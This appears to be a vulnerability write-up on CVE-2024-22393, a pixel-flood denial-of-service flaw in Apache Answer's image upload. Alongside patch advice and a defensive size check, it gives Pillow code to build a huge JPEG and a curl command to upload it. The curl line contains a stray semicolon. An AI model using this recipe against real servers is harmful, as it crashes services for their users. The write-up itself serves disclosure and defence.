CVE-2024-22393 - Unrestricted File Upload in Apache Answer Leads to OOM Pixel Flood Attack (Full Exploit Details)

CVE-2024-22393 is a critical vulnerability in Apache Answer (affected versions up to 1.2.1) where the application fails to properly restrict file types and image sizes uploaded by users. This flaw allows a logged-in user to upload a specially crafted image file (with a very high pixel count). Processing these oversized images can exhaust server memory (Out Of Memory Attack), causing a denial of service or server crashes.


> Vulnerable Product: Apache Answer
> Versions Affected: All through 1.2.1
> Patched Version: 1.2.5
> References:
> - Apache Answer Security Advisory
> - CVE Details

Why Is This Dangerous?

A regular user (not necessarily privileged) can upload an image with, for example, 100,000 x 100,000 pixels. The server will attempt to parse or resize this massive image in memory. This action will quickly exhaust available RAM, possibly taking down the whole answer platform or the hosting server.

This is known as a *Pixel Flood Attack*.

The file upload form does not properly check file types or pixel counts, so as long as you can log into the site and make a post with an image, you can launch this attack.

Technical Breakdown

- Image upload endpoint: /api/v1/file/upload

You can generate a huge JPEG using Python Pillow

from PIL import Image

img = Image.new('RGB', (120000, 120000), color = (255, 255, 255))
img.save("huge.jpg", "JPEG", quality=90)

> This creates a 120,000*120,000 pixel image. Even if the JPEG file size is small (due to compression), loading or processing will decode the full amount into server memory.

You can use curl or Postman to upload the image to the vulnerable API

curl -X POST "https://[your-apache-answer-instance]/api/v1/file/upload"; \
  -H "Authorization: Bearer YOUR_JWT_TOKEN" \
  -F "file=@huge.jpg"

On posting such an image, the server will attempt to process/render it. On typical machines or VMs, this can eat all memory and crash the process or OS.

Upon submission, the server will attempt to handle your file.

Expected result:
Server becomes sluggish, memory spikes, application crashes, or even entire server stops responding. Other users are denied service for as long as the process is down.

Patch & Fix

Upgrade to Apache Answer version 1.2.5 or later, which includes checks to restrict the maximum dimensions and file size for image uploads.

Example Patch Check (Pseudo-code)

from PIL import Image
import io

def handle_upload(file):  # file: a bytes stream
    img = Image.open(io.BytesIO(file))
    w, h = img.size
    if w > 4096 or h > 4096:
        raise Exception("Image dimensions too large")
    # Proceed with safe processing

Conclusion

CVE-2024-22393 is a textbook case of why file upload and image processing endpoints must *never trust user input*. Even simple image uploads can bring down powerful servers if you are not careful. If you are running Apache Answer < 1.2.5, patch ASAP.

Further Reading:
- Official Fix Pull Request
- Security Best Practices for File Uploads


Stay safe and always validate, restrict, and sanitize uploads!

Timeline

Published on: 02/22/2024 10:15:08 UTC
Last modified on: 08/01/2024 13:46:55 UTC